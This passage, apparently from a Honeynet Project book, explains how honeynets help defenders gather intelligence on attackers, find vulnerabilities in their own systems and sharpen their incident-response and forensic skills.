Value of a Honeynet
Traditionally, information security has been defensive. Firewalls, intrusion detection systems, encryption: All these mechanisms are used defensively to protect one's resources. The strategy is to defend one's organization as best as possible, detect any failures in the defense, and then react to those failures. The problem with this approach is that it is purely defensive; the enemy is on the attack. Honeynets attempt to turn the tables, giving organizations the initiative. The primary purpose of a Honeynet is to gather intelligence about the enemy. By doing so, organizations can, potentially, stop an attack or a failure in defense before it happens. Information security has often been compared to the military, such as the defense of a castle or guerrilla warfare. Regardless of the analogy you choose, organizations can take the initiative by learning about the enemy before it strikes.
For example, one of the primary communication channels blackhats use is IRC (Internet relay chat). Blackhats tend to communicate freely among themselves, revealing their motives, goals, and actions. We have captured these conversations through the use of Honeynets, monitoring every word. We have even captured real-time video shots of blackhats involved in the attacks on our Honeynet. Once, we tracked blackhats compromising hundreds of systems for the sole purpose of attacking the infrastructure of a specific country. We then relayed this information to organizations that were compromised by these individuals. We also warned the country of the impending attack, thereby mitigating the effectiveness of the blackhat attacks. We were able to specify the attackers' exact tools and methodology, tipping off these organizations with specific information to better react to and defeat the threat. You can read more about this incident in Chapter 11.
Honeynets also provide an organization with intelligence on its own security risks and vulnerabilities. Honeynets can consist of the same systems and applications that the organization is using for its production environment. This allows you to identify the risks and vulnerabilities that may exist in your production environment. For example, if your organization depended on Microsoft NT IIS (Internet Information Server) with a database back end for its Web server application, you could build a Honeynet with those components, allowing you to identify any risks existing in that environment. You can also use systems that you want to test or are considering for deployment. Perhaps you are considering a new load balancer or switch and have concerns about possible risks. The Honeynet gives you an environment in which you can test those risks. Often, these same risks may be missed in your production environment, owing to data overload. The production network entails so much activity that it is difficult to determine what is malicious activity and what is normal day-to-day network traffic. However, within the controlled environment of the Honeynet, these risks are easier to identify.
Furthermore, Honeynets can help an organization develop its incident-response capabilities. Over the past two years, the Honeynet Project has vastly improved our abilities to detect, react to, recover, and analyze systems that have been compromised. After numerous system compromises, we have perfected a variety of techniques. You can read more on these techniques in Chapter 6, Analyzing a Compromised System, and Chapter 8, Forensic Challenge. Traditionally, when you analyze a compromised system, you have no idea whether your analysis is correct; you can make only a best guess. The advantage one has in analyzing Honeynet compromised systems is that you already have most of the answers, as you captured every packet and keystroke sent to the system. You can then treat a compromised system as a "challenge," testing your abilities to determine what happened by using various forensic techniques. You can then compare these results to the data captured from within the Honeynet. This information can also be used to determine whether any other systems in your production network have been compromised. Once you have identified the signatures of the blackhat and the attacks, you can then review your production environment for the same signatures, identifying compromised systems you did not know about.
Over the years, we have discovered another advantage of Honeynets: They teach us a lot about not only the blackhat community but also ourselves and our security capabilities. A Honeynet is nothing more than a highly controlled lab that you put out on your network or on the Internet. You learn when blackhats compromise systems on the Honeynet. However, you also learn a great deal just setting one up and maintaining it. While working with Honeynets, we have learned extensively about logging, IDSs, forensics, network traffic analysis, system hardening, kernel modules, and a variety of other techniques.